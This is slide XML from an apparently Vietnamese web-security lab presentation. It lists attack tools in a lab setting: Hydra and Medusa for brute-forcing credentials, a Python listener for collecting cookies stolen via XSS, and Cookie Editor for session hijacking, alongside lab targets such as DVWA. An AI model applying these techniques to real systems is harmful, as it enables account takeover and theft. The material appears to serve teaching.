                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3.2.2. Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2C38F9-8FF8-BD2F-C0DE-E221CEF033F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90</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{820BFFB9-8095-0003-BA4D-B5FA24686853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70536" y="959662"/>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Hydra và Medusa: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Công cụ tấn công vét cạn (Brute Force) để bẻ khóa thông tin xác thực trên nhiều giao thức (SSH, FTP, HTTP).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEF5ABE3-0465-89E3-3EDB-F16E2A488B2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="30954"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="189230" y="2449813"/>
            <a:ext cx="4782820" cy="21767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72B9796E-6E96-B6E2-692F-280B4E2F1D4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3826356" y="3235325"/>
            <a:ext cx="5220335" cy="1984375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25018608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D2504-6BE0-EF77-2144-93967D239A2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2F64F5F-48BF-532A-2EFA-F9AD164860AF}"/>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8169204B-2D91-8399-FC07-B56B7C723775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3.2.2. Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{364BDC75-F358-7C64-89D7-2D94CF51311B}"/>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91</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09511B12-27ED-FA98-ECD4-F1E284953A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26773" y="876516"/>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PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Web Security Academy (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Môi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Lab)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FFE0746-155C-3C0C-EC96-D6E821F1B08A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1905002"/>
            <a:ext cx="7960359" cy="3809998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30158432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F5436-E0B8-FCA3-EE7E-DFD070E8B2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6C0BC96-C719-6428-12D7-1CE67741297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5249F92D-EAB3-AF56-D907-B1DAE4C1EA4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3.2.2. Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FBF6A35-DFA8-2868-8A61-E750282330B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92</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ADACBC2-E519-4A2C-1339-569A502F07FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26773" y="876516"/>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Dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Twiki</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{100E8782-5F15-D9F2-4062-4F235CE4E099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="658598" y="1742142"/>
            <a:ext cx="7651750" cy="3668112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="750479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DACAA-D954-3CE0-7429-D001E726650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EF1EAD-253C-8235-593E-4A1796F39F00}"/>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8154A205-44BA-A1E4-365B-BF8072EFA3A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3.2.2. Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90A3A91E-D0C2-1183-FA45-20291FAB7C56}"/>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93</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90E29EC7-AAAC-AA63-B099-06029E5CB04B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1257300"/>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Python3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Thường được dùng để tạo máy chủ lắng nghe giả mạo (listener) nhằm thu thập cookie bị đánh cắp trong các cuộc tấn công XSS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8BA343-BA32-A2FB-A87E-E4A487B6DBEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="782594" y="2900921"/>
            <a:ext cx="7578811" cy="2105584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3353203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1EA8A-C0D5-DF44-9706-7786492CD26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9EA7B6C-A627-C43F-92CB-B95841680539}"/>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D33EB09-044C-E98E-A621-B82A8F16E755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3.2.2. Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF20471A-1086-D1A8-F1FF-EF93FEA633A2}"/>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94</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C57F7C-A77D-53F3-B72A-796BF25A1868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="862487"/>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b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Cookie Editor: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Công cụ thiết yếu để thao tác và chèn thủ công các giá trị cookie phiên (Session ID) bị đánh cắp để Session Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51DF606-0510-DB53-2BDA-C38C1B7D52B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="2352638"/>
            <a:ext cx="7239000" cy="3360178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6779022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F86F7-BAE3-803C-73DF-B8152EA2787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7BB1FC6-818B-706C-50AC-F32A29359197}"/>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4080BD24-8845-4094-9FCC-1C45E70E7711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3.2.2. Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59AF5B22-6DE0-1AB9-4455-28E7A060BDCE}"/>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95</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF01029-C215-94D1-693C-44C024C8B0C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1145997"/>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Dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA09E19-2047-A342-7F87-89D7C19616AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1901623"/>
            <a:ext cx="8077200" cy="3384741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1148849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821F0-E49B-BB60-ED1B-498881936D5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C3A9050-DA06-D07C-FD5D-6297A3EA498E}"/>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18CBA48B-47E6-27D6-1073-2A70D90373E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3.2.2. Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17155BC2-AA89-961A-F624-85E69D0F7101}"/>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96</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{914A4D08-DF60-FF8B-F08F-8403E22C1A0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1145997"/>
            <a:ext cx="8915400" cy="56682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err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
